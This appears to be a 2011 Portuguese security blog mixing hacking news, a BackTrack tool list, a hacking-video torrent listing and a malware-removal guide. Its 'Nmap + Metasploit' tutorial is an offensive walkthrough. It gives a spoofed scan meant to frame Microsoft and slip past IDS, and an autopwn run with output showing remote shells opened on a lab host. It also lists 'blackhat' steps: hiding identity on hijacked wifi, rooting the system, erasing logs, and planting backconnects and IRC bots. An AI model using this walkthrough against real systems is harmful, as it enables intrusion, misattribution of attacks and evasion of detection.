A proposta, encontrada entre dados vazamentos pelo site de jornalismo colaborativo Crowdleaks, explica como o código malicioso seria capaz de permanecer no sistema de tal forma que seria muito difícil detectá-lo ou removê-lo. Ele usaria “4kb ou menos” de memória e poderia aceitar comandos externos – para controlar a máquina infectada – de formas diversas, inclusive burlando firewalls.

Hoglund é o responsável pelo site Rootkit.com, conhecido por ser uma biblioteca virtual de recursos – de defesa e ataque – relacionados a pragas digitais que se camuflam no sistema e permitem ao invasor manter tudo sob controle de forma invisível, roubando dados e realizando outras atividades maliciosas.

Stuxnet
A HBGary recebeu uma cópia do Stuxnet da fabricante de antivírus McAfee. A análise dos documentos pelo Crowdleaks aponta para um possível interesse de fazer a companhia não se pronunciar publicamente o vírus, que atacou centrífugas nucleares no Irã e pode ter sido criado por agentes dos Estados Unidos e Israel.

A empresa discutia a relação do vírus com os sistemas de segurança dos Estados Unidos – apontando a vulnerabilidade de órgãos como a Administração de Segurança de Transportes (TSA).

A empresa também tinha conexões na Agência de Segurança Nacional norte-americana (NSA). Em um e-mail, Aaron Barr, responsável pela companhia relacionada HBGary Federal, fornece seu número de telefone a Cheryl D. Peace, que trabalha na NSA em um cargo desconhecido, mas que era diretora de cibersegurança do Departamento de Segurança Nacional dos EUA em 2004.

0
Site do Partido Progressista de São Paulo é hackeado

O site do Partido Progressista de São Paulo foi hackeado na noite de quinta-feira (17). Ao entrar na página principal do partido, uma foto do deputado federal reeleito Paulo Maluf (PP-SP) aparecia com as frases: "Maluf procurado pela Interpol. Vivo ou Morto". A página hackeada ainda dizia: "Você não pode confiar, você não pode perdoar. Você faz a diferença! Lute pelos seus direitos!".

A mensagem é uma referência à página da Interpol que classifica Maluf como um criminoso procurado. O pedido de prisão foi expedido por um tribunal de Nova York. Flávio Maluf, filho do deputado reeleito, também está na página da Interpol. A Justiça brasileira absolveu Maluf, que permitiu que o deputado fosse reeleito mesmo com a lei da Ficha Limpa.

O hacker se identificou como TRON e disse que foi patrocinado pelo Partido Verde.

sexta-feira, 11 de fevereiro de 2011

1
Juntos são uma arma poderosa Nmap + Metasploit.

Preparando para ver o alvo

Nmap vamos usar para pegar informações das portas do alvo e também dos banners dos serviços rodando, Quem sabe um FingerPrint,em outras palavras vai ser nossa visão.
Pessoal do Windows Baixe o Nmap em “http://nmap.org” caso use Linux procure o package para
instalar dependendo da sua distro pode ser usado apt,yum,pacman,installpkg,emerge.Pessoal do BSD e MacOS use ports.Nmap foi usado para retratar ataques de BlackHats em filmes até veja “http://nmap.org/movies.html”.Acabando com papo vamos continuar…


Preparando a Arma

Metasploit vamos usar para explorar a falha achada e executar o nosso payload assim obtemos nossa Shell,Metasploit seria um framework feito na linguagem Ruby muito usado pelo pessoal do meio do hacking com intuito de fazer “pentest”,O problema é que muitos “Black Hats” tem seus metasploits com bugs 0days feito por eles mesmo ou por negócios de venda de outras shells etc.Com Metasploit você dispõe de um banco de exploits e de payloads para ser testados injetados etc. Preciso falar mais nada ta ai nossa M16,
kkkkkk
baixe o tarball no site oficial www.metasploit.com
para quem usa windows procure a versão para o mesmo no site oficial também…

Iniciando

Antes que você leia outros tutoriais ai destas ferramentas venho declarar que não
é só mirar e atirar no autômatico,tem que ser inteligente usar a cabeça,pois
um ataque de “Script Kid” é rídiculo sem falar que os IDs como Snort apitão bem
em ataques sem noção.
Não seja uma criança com uma arma use o artigo com prudéncia…
continuando…

Usando o Nmap

bem até para ver o alvo podemos ser localizados e eventualmente achados pelo alvo então devemos ser mais sutil com Nmap possível,Lembre-se você não sabe o que tem no servidor,não sabe se tem uma intranet etc, então um footprint levantamento de dados antes de usar o nmap seria uma boa pedida,Mas indo direto com nmap vamos usar uma técnica chamada “Spoofing” para mascarar nosso “IP” assim forjano um falso atacante no alvo

vou dar um exemplo:

# nmap -sF -P0 -O -e eth1 -S microsoft.com ibm.com

usamos o server da microsoft como mascara assim o SysAdmin da IBM vai notar que a microsoft esta atacando ele com packets Fin(-sF) para obter fingerprint, isso seria Spoofing! agora que você tem um meio de purlar os IDs.Nmap é um mar de informações e métodos de ataques cabe a você leitor navegar nele á navegadores que trabalham
até com scripts Lua em comjunto com nmap…


Usando Metasploit e partindo para a porrada

Tem muitos livros falando ai do nosso metasploit por ser um framework poderoso como ja falei,ja mandei uma Dica quente no Nmap que seria “spoofing” no metasploit você pode usar ele em conjunto com “TOR” para ajudar no anonimato,Vo deixa para você aprender a arrombar portas em silencio sozinho,eu tenho meu método mais de graça não vou falar,Continuando vou dar um exemplo de uso do combo letal Nmap+Metasploit porem bem ignorante sem “Spoofing” nem nada soh usando parametro “-sS”. bem ignorante ou seja ataque ala moda do lobo ja partindo pra Porrada.

Ataque ------------------------------------------------------------------

bt ~ # nmap -sS 192.168.80.129 -oX nmap.xml

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 12:04 GMT
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

[End Result]------------------------------------------------------------------------------------

Now we got nmap.xml for import to Metasploit framework...

[Import Nmap result to Metasploit]--------------------------------------------------------------

bt framework3 # msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/test.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/test.db
msf > db_import_nmap_xml /root/nmap.xml
msf > db_hosts
[*] Time: Fri Jul 03 14:01:56 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -p -e
[*] (3/116): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.80.129:80...
[*] (8/116): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.80.129:80...
[*] (9/116): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.80.129:80...

[*] Started bind handler
[*] Started bind handler
[*] (12/116): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.80.129:80...
[*] (13/116): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Started bind handler
[*] Started bind handler
[*] Job limit reached, waiting on modules to finish...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:52929 -> 192.168.80.129:10529)

sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:52929 -> 192.168.80.129:10529
2 Command shell 192.168.80.131:50775 -> 192.168.80.129:17887
3 Command shell 192.168.80.131:40985 -> 192.168.80.129:37295
4 Command shell 192.168.80.131:51652 -> 192.168.80.129:37095
5 Command shell 192.168.80.131:38373 -> 192.168.80.129:17130
6 Command shell 192.168.80.131:56722 -> 192.168.80.129:20693

msf >sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32> bingo xD


explicando usamos Nmap para pegar informações do Host depois adicionar uma saída XML passamos o XML para o metasploit usando o Banco com SQLite assim o metasploit vai tentando HAckiar o host apartir de algumas informações do Nmap,e depois tenta rodar exploit por exploit se algum for injetado com sucesso te retorna com payload.

Lindo né! Porem o ataque ignorante em um servidor com *BSD ou Linux ataque iria rodar e os IDs iriam logar ou até mesmo ativar um honey-pot para te enganar… então estude Para você chegar em um tipo de ataque stealth.

Então definimos umas metas para um ataque bem sucedido de um blackhat.

*garanta seu Anonimato seja por proxy,hack wifi forjando rede de alguem,ponte|laranja etc…
*Footprint inteligente Whois,traceroute,usar hping2 para tentar pegar banners de serviços etc…
*FIngerprint com Nmap
*Exploramos o alvo usando determinado “exploit”
*se obter sucesso no ataque defina o que deve ser feito como exemplo RooTar o sistema
usando exploit local depois queimar os logs,upar um BC,ircbot etc…

Tendo tudo isso em mente podemos nos defender com algumas medidas

*deixar o sistema sempre STABLE se for servidor pois UNSTABLE sempre tem Bugs e meios de exploração
*ter um firewall bem configurado seja iptables, Packet filter etc…
*Ter menos serviços possíveis rodando nas portas tenha só o necessario por exemplo
servidor de Web deixe só apache ou outro serviço de web no máximo um FTP
servidor de e-mail deixe só o postfix ou outro serviço semelhante não invente muito
evite deixar todos os serviços num servidor só como SSH,ldap,samba,apache,ssl,kerberus,
cups,postfix,ftp…
quinta-feira, 10 de fevereiro de 2011

1
Microsoft corrige 22 vulnerabilidades em pacote de atualizações

A Microsoft lançou 12 atualizações que corrigem um total de 22 vulnerabilidades no Windows, Internet Explorer, Visio e recursos de redes Windows como o Active Directory. A Microsoft considera que apenas três das 12 atualizações são críticas: uma no Internet Explorer, uma no Windows Explorer e outra no processamento de fontes.

Duas das falhas consideradas “críticas” são “dia zero” – conhecidas antes mesmo da existência de uma solução. Uma das falhas corrigidas no Internet Explorer (são quatro no total) era conhecida desde dezembro. Correções para essas falhas eram esperadas já em janeiro, mas isso não aconteceu. Com ela, qualquer página de internet maliciosa poderia instalar vírus no computador.
A outra falha estava na geração de miniaturas de fotos pelo Windows Explorer. Com ela, um criminoso poderia criar um arquivo especial de tal maneira que, ao tentar gerar a miniatura, o Windows Explorer executasse códigos que poderiam dar o controle do PC ao autor da imagem maliciosa.

A última falha que a Microsoft considerou crítica está no processamento de fontes (tipos de letra). Criando uma fonte especial, criminosos poderiam explorar a falha de diversas maneiras para infectar e controlar sistemas.

Outras falhas corrigidas estão no Microsoft Visio – programa usado para criar diagramas – e nos serviços de servidor Active Directory e FTP do Internet Information Services. Outras falhas no Windows atingem tanto PCs como servidores e permitem que um ataque que consiga um acesso mínimo ao sistema seja escalado para obter o controle total do computador.

Aplicando as correções

As correções da Microsoft devem ser aplicadas por meio do Microsoft Update ou configurando as atualizações automáticas no Painel de Controle do Windows. As correções são lançadas, no mínimo, todos os meses, na segunda terça-feira de cada mês. Configurar as atualizações automáticas garante que o sistema estará sempre com o máximo de proteção possível.

Falhas sem correção

Existem diversas falhas em produtos da Microsoft que ainda carecem de uma solução definitiva. A empresa de segurança TippingPoint, por meio do seu programa Zero Day Initiative, recebe informações sobre brechas de segurança e decidiu, há seis meses, que iria divulgar os dados de falhas que aguardavam uma correção por seis meses.
Como o período já se passou, a Microsoft foi uma das empresas envolvidas e quatro novas falhas em produtos da empresa, que ela conhecia desde agosto passado, foram divulgados.

0
Hackers atacaram sistemas de companhias de petróleo, diz McAfee

A McAfee divulgou um relatório nesta quinta-feira (10) que explica como hackers invadiram sistemas de companhias de petróleo e gás natural para roubar informações sigilosas. O ataque, chamado pela empresa de “Dragão Noturno”, teria como alvo entre 5 e 12 companhias. Além disso, apresentou pouca sofisticação e teria envolvido ferramentas e indivíduos chineses.

O relatório não fornece o nome das multinacionais envolvidas, mas informa que os indivíduos atacados estão localizadas no Cazaquistão, na Grécia, em Taiwan e nos Estados Unidos. Também não há, no texto, o número de companhias envolvidas. Dmitri Alperovitch, vice-presidente de pesquisa da McAfee, disse ao “New York Times” que empresa confirmou cinco alvos, mas que até 12 empresas podem ter sido atacadas.

A McAfee acredita que chineses podem ter sido envolvidos. Segundo o relatório, os hackers trabalhavam durante o horário comercial da China e usavam ferramentas predominantemente chinesas. Os servidores que controlavam o ataque estavam localizados nos Estados Unidos e na Holanda. No entanto, no caso dos EUA, eram servidores alugados por um chinês da província de Shandong. Os servidores holandeses usados, por sua vez, foram invadidos e postos a serviço dos hackers.

Sem sofisticação

Ataques direcionados como a Operação Aurora, que atacou o Google e outras empresas, e o Stuxnet, que atingiu usinas iranianas, destacam-se pela sua sofisticação. Evidências sugerem o envolvimento do governo chinês no ataque ao Google e de Israel e dos EUA no ataque ao Irã, mas, nesse caso, a McAfee diz não acreditar em qualquer envolvimento governamental.
Os hackers invadiram as empresas enviando e-mails maliciosos para executivos ou explorando falhas básicas em serviços de internet. Uma vez dentro da rede, eles descobriram como desativar os filtros de acesso à internet e obter o controle total das máquinas usando ferramentas facilmente encontradas na internet.

Hackers assalariados

Apesar de não existirem provas definitivas, a McAfee sugere que os hackers envolvidos estavam trabalhando para uma empresa em Pequim. Os dados roubados eram enviados para endereços IP da China e o ataque ocorria apenas durante o horário comercial, em dias de semana.
A empresa acredita, por isso, que os indivíduos eram funcionários pagos e não freelancers ou ativistas trabalhando de forma independente.
sexta-feira, 4 de fevereiro de 2011

0
BackTrack Distribuição para hackers.



Backtrack ,
distribuição com foco em testes de seguranças e testes de penetração (pen tests), muito apreciada por hackers e analistas de segurança, podendo ser iniciado diretamente pelo CD (sem necessidade de instalar em disco), mídia removível (pendrive), máquinas virtuais ou direto no disco rígido[3].
História e descrição

Foi evoluído da combinação de duas distribuições bem difundidas - Whax e Auditor Security Collection. Juntando forças e substituindo essas distribuições, BackTrack ganhou uma popularidade massiva e foi eleito em 2006 como a Distribuição Live de Segurança número 1 em sua categoria, e 32º no geral, pela Insecure.org. Profissionais de segurança, assim como novatos, estão usando BackTrack como seu kit de ferramentas favorito pelo mundo todo.

BackTrack tem uma longa história e foi baseado em várias distribuições de Linux diferentes até agora ser baseado em uma distribuição Linux Slackware e os scripts do live CD correspondentes por Tomas M. (www.slax.org). Cada pacote, configuração de núcleo e script é otimizado para ser utilizado pelos testadores de penetração de segurança. Patches e automação têm sido adicionados, aplicados e desenvolvidos para oferecer um ambiente organizado e pronto para a viagem.

Após ter chegado em um procedimento de desenvolvimento estável durante os últimos lançamentos, e consolidando feedbacks e complementos, o time focou-se em dar suporte a mais dispositivos de hardware, e novos dispositivos, bem como oferecer mais flexibilidade e modularidade por meio da reestruturação de processos de construção e manutenção. Com a atual versão, a maioria das aplicações são construídas como módulos individuais que ajudam a acelerar os lançamentos de manutenção e correções.

Por Metasploit ser uma das ferramentas-chave para a maioria dos analistas, ele é estreitamente integrado no BackTrack e ambos os projetos colaboram juntos para sempre providenciar uma implementação detalhada do Metasploit dentro das imagens do CD-Rom do BackTrack ou nas futuras imagens de virtualização mantidas e distribuições da remote-exploit.org (como aplicações de imagens VMWare).

Ser superior e fácil de usar é a chave para um bom Live-CD de segurança. Pega-se coisas um passo adiante e alinha o BackTrack às metodologias de teste de penetração e frameworks de avaliação (ISSAF e OSSTMM). Isso irá ajudar nossos usuários profissionais durante seus pesadelos de relatório diário.

Atualmente BackTrack consiste de mais de 300 ferramentas diferentes e atualizadas, que são logicamente estruturadas de acordo com o fluxo de trabalho de profissionais de segurança. Essa estrutura permite até novatos encontrar as ferramentas relacionadas a uma tarefa específica para ser cumprida. Novas tecnologias e técnicas de teste são combinadas no BackTrack o mais rápido possível para mantê-lo actualizado.

Nenhuma plataforma de análise comercial ou livremente disponível oferece um nível equivalente de usabilidade com configuração automática e foco em testes de penetração.


Lista de Ferramentas do BackTrack

Coleta de Informações
Ass
DMitry
DNS-Ptr
dnswalk
dns-bruteforce
dnsenum
dnsmap
DNSPredict
Finger Google
Firewalk
Goog Mail Enum
Google-search
Googrape
Gooscan
Host
Itrace
Netenum
Netmask
Pirana
Protos
QGoogle
Relay Scanner
SMTP-Vrfy
TCtrace

Mapeamento de Rede

* Amap 5.2
* Ass
* Autoscan 0.99_R1
* Fping
* Hping
* IKE-Scan
* IKEProbe
* Netdiscover
* Nmap
* NmapFE
* P0f
* PSK-Crack
* Ping
* Protos
* Scanrand
* SinFP
* Umit
* UnicornScan
* UnicornScan pgsql 0.4.6e module version 1.03
* XProbe2

PBNJ 2.04

* OutputPBNJ
* ScanPBNJ
* Genlist

Identificação de vulnerabilidade

* Absinthe
* Bed
* CIRT Fuzzer
* Checkpwd
* Cisco Auditing Tool
* Cisco Enable Bruteforcer
* Cisco Global Exploiter
* Cisco OCS Mass Scanner
* Cisco Scanner
* Cisco Torch
* Curl
* Fuzzer 1.2
* GFI LanGuard 2.0
* GetSids
* HTTP PUT
* Halberd
* Httprint
* Httprint GUI
* ISR-Form
* Jbrofuzz
* List-Urls
* Lynx
* Merge Router Config
* Metacoretex
* Metoscan
* Mezcal HTtp://S
* Mibble MIB Browser
* Mistress
* Nikto
* OAT
* Onesixtyone
* OpenSSL-Scanner
* Paros Proxy
* Peach
* RPCDump
* RevHosts
* SMB Bruteforcer
* SMB Client
* SMB Serverscan
* SMB-NAT
* SMBdumpusers
* SMBgetserverinfo
* SNMP Scanner
* SNMP Walk
* SQL Inject
* SQL Scanner
* SQLLibf
* SQLbrute
* Sidguess
* Smb4K
* Snmpcheck
* Snmp Enum
* Spike
* Stompy
* SuperScan
* TNScmd
* Taof
* VNC_bypauth
* Wapiti
* Yersinia
* sqlanlz
* sqldict
* sqldumplogins
* sqlquery
* sqlupload

Penetração

* Framework3-MsfC
* Framework3-MsfUpdate
* Framework3-Msfcli
* Framework3-Msfweb
* Init Pgsql (autopwn)
* Milw0rm Archive
* MsfCli
* MsfConsole
* MsfUpdate
* OpenSSL-To-Open
* Update Milw0rm

Escalação de Privilégio

* Ascend attacker
* CDP Spoofer
* Cisco Enable Bruteforcer
* Crunch Dictgen
* DHCPX Flooder
* DNSspoof
* Driftnet
* Dsniff
* Etherape
* EtterCap
* File2Cable
* HSRP Spoofer
* Hash Collision
* Httpcapture
* Hydra
* Hydra GTK
* ICMP Redirect
* ICMPush
* IGRP Spoofer
* IRDP Responder
* IRDP Spoofer
* John
* Lodowep
* Mailsnarf
* Medusa
* Msgsnarf
* Nemesis Spoofer
* NetSed
* Netenum
* Netmask
* Ntop
* PHoss
* PackETH
* Rcrack
* SIPdump
* SMB Sniffer
* Sing
* TFTP-Brute
* THC PPTP
* TcPick
* URLsnarf
* VNCrack
* WebCrack
* Wireshark
* Wireshark Wifi
* WyD
* XSpy
* chntpw

Mantendo Acesso

* 3proxy
* Backdoors
* Matahari
* CryptCat
* HttpTunnel Client
* HttpTunnel Server
* ICMPTX
* Iodine
* NSTX
* Privoxy
* ProxyTunnel
* Rinetd
* TinyProxy
* sbd
* socat

Cobrindo Rastros

* Housekeeping

Análise de Rede de Rádio 802.11

* AFrag
* ASLeap
* Air Crack
* Air Decap
* Air Replay
* Airmon Script
* Airpwn
* AirSnarf
* Airodump
* Airoscript
* Airsnort
* CowPatty
* FakeAP
* GenKeys
* Genpmk
* Hotspotter
* Karma
* Kismet
* Load IPW3945
* Load acx100
* MDK2
* MDK2 for Broadcom
* MacChanger
* Unload Drivers
* Wep_crack
* Wep_decrypt
* WifiTap
* Wicrawl
* Wlassistant

Bluetooth

* Bluebugger
* Blueprint
* Bluesnarfer
* Btscanner
* Carwhisperer
* CuteCom
* Ghettotooth
* HCIDump
* Ussp-Push

Análise VOIP & Telefonia

* PcapSipDump
* PcapToSip_RTP
* SIPSak
* SIPcrack
* SIPdump
* SIPp
* Smap

Forense Digital

* Allin1
* Autopsy
* DCFLDD
* DD_Rescue
* Foremost
* Magicrescue
* Mboxgrep
* Memfetch
* Memfetch Find
* Pasco
* Rootkithunter
* Sleuthkit
* Vinetto

Engenharia Reversa

* GDB GNU Debugger
* GDB Console GUI
* GDB Server
* GNU DDD
* Hexdump
* Hexedit
* OllyDBG

Serviços

* SNORT


FONTE:
http://pt.wikipedia.org/wiki/BackTrack

Download: ISO

0
Vídeo aulas BackTrack DVD ( torrent )

Nome: Backtrack DVD Tutorial
Tamanho: 5.6GB
Contem:

Installing Backtrack 3
Episode 1 – Network Hacking – Arp Poisoning
Episode 2 – Wireless Hacking – Cracking WEP
Episode 3 – Wireless Hacking – DeAuth
Episode 5 – Lock Picking – Bump Key
Episode 6 – Phone Phreaking – Beige Box
Episode 7 – Phone Phreaking/Network Hacking – Sniffing VOIP
Episode 8 – Lock Picking – DIY Padlock Shims
Episode 9 – Lock Picking – Mult-Disc Combo Locks
Episode 10 – Hacking Basics – MD5
Episode 11 – Website Hacking – Sql Injection
Episode 12 – Hacking Basics – Backtrack
Episode 13 – Website Hacking – XSS
Episode 14 – Staying Secure – SSH Tunnel
Episode 15 – Modding – Xbox Softmod
Episode 16 – Wireless Hacking – Cracking WPA
Episode 17 – Triple Boot – Windows, Backtrack, & Ubuntu
Episode 18 – Local Password Cracking
Episode 19 – Lock Picking Basics
Episode 20 – Ettercap
Episode 21 – XSS Tunnel
Episode 22 – Playstation 2 Softmod
Episode 23 – Cracking WEP Update
Episode 24 – Bypass Hotspot's Access Controls

Underground – Install Backtrack 3 on USB
Underground – CSRF(Cross Site Request Forgery)
Underground – Alternate Data Streams
Underground – Local File Inclusion
Underground – Windows Privilege Escalation
Underground – Bluetooth Hacking
Underground – VMWare
Underground – Fix Google Mail Enumerator
Underground – Home Made Lock Picks
Underground – Downfalls of Anti-Virus Software Part 2
Underground – Downfalls of Anti-Virus Software
Underground – Evilgrade
Underground – Trojan Basics
Underground – Manipulating Windows User Accounts
Underground – Combine Files
Underground – Password Phishing
Underground – Windows SMB Relay Exploit
Underground – Application Patching
Underground – Metasploit Autopwn
Underground – Email Spoofing
Underground – Introduction
Extracting Database Information from Information_Schema
FPGA MD5 Cracker
Arduino ARP Cop
Email Injection
Ping of Death
DNS Spoofing with Virtual Hosts
Bypass Cisco Clean Access & Cisco NAC Appliance
Dual Boot – Windows & Backtrack
Sql Injection Challenge How-to
How to use Intel Pro/Wireless 3945ABG in Backtrack 2
Local Privilege Escalation Vulnerability in Cisco VPN Client

Baixar Torrent: LINK

1
Google oferece US$ 20 mil para quem 'hackear' o Chrome

Como parte do concurso de hacking deste ano, o Pwn2Own, o Google está oferecendo US$ 20 mil e um laptop CR-48 rodando o Chrome OS, para o hacker que explorar uma brecha de segurança no seu navegador Chrome.

O competidor deve usar as vulnerabilidades presentes no código escrito pelo Google e escapar da "caixa de areia" para obter sucesso.
Organizado pela Zero Day Initiative (ZDI), o concurso oferece prêmios adicionais, totalizando US$ 105 mil para "hacks" com sucesso em outros navagadores como o Internet Explorer, Safari e Mozilla Firefox e também nos telefones móveis Dell Venue Pro rodando o Windows 7, o iPhone 4 rodando iOS, Blackberry Torch 9800 Blackberry OS 6 e S Nexus rodando o Android.
terça-feira, 1 de fevereiro de 2011

1
A falta de informação das pessoas aliada à falta de segurança

A falta de informação das pessoas aliada à falta de segurança do Windows traz sérios riscos, não é de hoje. Um programa com código malicioso executado no computador pode fazer coisas das mais terríveis. Tudo bem, isso já é do conhecimento de todos, mas de qualquer forma as pessoas precisam usar seus computadores, e estes devem estar livres de pragas.

Use antivírus. Use antispyware. Use firewall. Até que ponto isso é verdadeiro? Muita gente se surpreende comigo quando digo: eu não uso antivírus! Recuso-me até a morte (ou, quem sabe, até que um vírus me prove o contrário . E não recomendo, sinceramente. Tudo fica mais lento. Mesmo em PCs atuais, sou meio contra a idéia de haver um programa tendo que monitorar todos os dados no meu computador em tempo real, em busca de um código malicioso. Isso é coisa para sistemas operacionais incompetentes.

O que não vem a ser totalmente o caso do Windows, pois quem está diante do sistema é uma pessoa. É a pessoa que deveria saber o que abrir, o que fazer e como agir. Ninguém nasce sabendo, então trago aqui algumas noções importantes para detectar e eliminar boa parte dos malwares que infectam o Windows. Além, é claro, de tentar conscientizar um pouco sobre medidas de segurança que boa parte das pessoas sabem – ou pelo menos já ouviram falar – mas não se dão ao trabalho de cumpri-las.

Fui infectado! E agora?

Esses dias entrou um malware no computador de uma amiga, daqueles que ficam enviando mensagens pelo MSN. Eles detectam a janela de conversa aberta e enviam comandos à mesma, fazendo com que um texto seja enviado para a pessoa com a qual a outra esteja conversando – como se tivesse sido digitada pela pessoa. Minha amiga estava com o nick “Tá enviando vírus, não clique!”. E logo que abríamos a conversa normalmente vinham lá alguns dizeres “Olha as fotos que eu tirei com não sei quem, veja aqui...” seguido de um endereço de um site suspeito. Claro, clicando, mais uma pessoa seria infectada. Além disso, vai saber o que esse programinha não fazia nos bastidores. Hoje em dia roubar dados é a principal idéia dos malwares: senhas, contatos, tudo o que foi digitado. Foi-se o tempo em que vírus destruía para se exibir.

Numa seção de “exorcismo” virtual, ajudei essa amiga pelo MSN mesmo, de uma forma simples. Ela estava passando desesperada o AVG e um antispyware, e nada de eles detectarem a praga. Então lá fui eu. Pedi para ela abrir o gerenciador de tarefas do Windows na aba “Processos”, e me enviar uma imagem da tela. Com base nisso eu chutaria alguns processos e mandaria ela fechar. E isso foi feito. O malware foi fechado. A segunda parte foi um pouco mais complicada para ela, mas nada tão doloroso: abrir o MSConfig e desativar a inicialização do maldito (eu procuraria diretamente no registro, mas ela iria se perder). Depois de reiniciado o PC, esse pelo menos já era. AVG 0 x 1 Eu!

Os malwares são programas como outros quaisquer. Na grande maioria das vezes, são programas que se configuram para iniciar junto com o Windows. E ficam fazendo sua ação. Seja enviar spam (usando o seu IP e a sua banda!), usar seu computador como servidor de um software P2P qualquer ou tentar capturar suas senhas.

Esses quase sempre podem ser removidos manualmente, usando programas simples de monitoramento. A idéia é: eles estão abertos, vamos fechá-los! E se eles se configuram para serem iniciados junto com o computador, vamos remover essa configuração. Alguns casos mais graves podem ocorrer, onde os vírus mais “poderosos” se infiltram dentro de arquivos do sistema, corrompendo-os. Aí a coisa complica, seria tarefa mais para um antivírus (agora sim, automatizada) mas normalmente dá para restaurar arquivos do sistema, caso os arquivos infectados sejam os nativos do Windows. Bem, vamos por partes...

Identificando e removendo um programa indesejado

Como no caso da minha amiga, usei uma idéia básica. Mas para isso, eu precisaria tentar chutar o programa a ser fechado, pelo nome do executável. Como saber? O Windows por si só carrega diversos programas em execução (processos) próprios, para uso do sistema. Cada programa aberto também será considerado um processo, e listado, portanto, no gerenciador de tarefas e os malwares também ficarão por ali.

A idéia é listar ou decorar os nomes dos programas do Windows que sempre se iniciam, mais aqueles que você usa e que se iniciam automaticamente também (como seu antivírus, o firewall, etc). Com base nisso, você pode ir tentando fechar os malwares. Na dúvida, uma dica é copiar o nome do programa e jogar no Google. Se for um malware conhecido, provavelmente você irá encontrar páginas (normalmente de fóruns) relatando-o. Aí não resta dúvida, basta fechá-lo.

Acontece que o gerenciador de tarefas do Windows pode ser facilmente corrompido ou modificado, e é possível que um programa nem apareça nele. Além disso, alguns malwares bloqueiam o gerenciador de tarefas (usando recursos do próprio Windows, por incrível que possa parecer!). Para uma pescagem mais profunda, vamos usar outro gerenciador de tarefas.

Um muito bom é o Process Explorer NT. Ele é da SysInternals, que foi comprada pela Microsoft. Eu pensava que seria descontinuado depois da compra, mas pelo contrário, foi até atualizado para trabalhar melhor no Windows Vista.





Baixe em: LINK

Ele lista todos os processos abertos e permite visualizar muitas informações sobre os mesmos. A listagem é hierárquica, ele mostra os processos e os processos que os originaram (o programa que abriu outro programa, numa linguagem mais clara). Clicando com o botão direito num item, pode-se matar o processo correspondente, fechando bruscamente o programa.

O fechamento dessa forma é essencial. Uma que os malwares normalmente não exibem janelas, não tem onde você clicar para fechar. Outra que, mesmo se exibissem, é diferente o comando que o sistema operacional envia ao programa para fechá-lo. Ao clicar no botão com o X numa janela, o Windows não necessariamente fecha o programa; ele diz ao programa que é para ser fechado. O programa pode fazer o que quiser, inclusive decidir se vai mesmo ser fechado ou não.

É isso que permite a um programa tomar a dianteira e exibir uma janela perguntando se você quer salvar um arquivo antes de fechá-lo, dando a opção de mantê-lo aberto, por exemplo. Se ele fosse fechado diretamente ao clicar no X, você perderia qualquer arquivo não salvo.

Aqui, o objetivo é justamente o contrário: fechar o programa “à força”, “matar o processo”, como se diz. O sistema operacional finaliza o programa e libera os recursos usados por ele (como a memória) sem notificá-lo. Algumas vezes complica um pouco, pois malwares mais elaborados podem manter duas instâncias de si mesmo, e se uma for fechada logo a outra detecta e a reabre. Mas com um pouco de paciência e prática, dá para se virar e tomar o controle. Afinal, o computador é seu, não do malware.

Esse Process Explorer NT permite até mesmo “pausar” um determinado programa, e continuá-lo depois. Estando “pausado”, o programa continua aberto mas parece morto; por exemplo, esse que envia mensagens pelo MSN, não enviaria enquanto estivesse pausado. Essas ações são feitas ao clicar com o botão direito no processo, dentro do Process Explorer NT.

Pode ocorrer de você fechar um programa inofensivo realmente, por desconhecer o nome dele. Normalmente isso não lhe trará problema algum, bastará reabrir o programa que foi fechado depois. Tome o cuidado de não manter arquivos abertos ou documentos não salvos enquanto fecha os programas suspeitos, e também evite fazer isso conectado à Internet. Simples: você pode fechar seu firewall sem querer e continuar por horas navegando – sem perceber que abriu as portas do seu computador para o mundo.

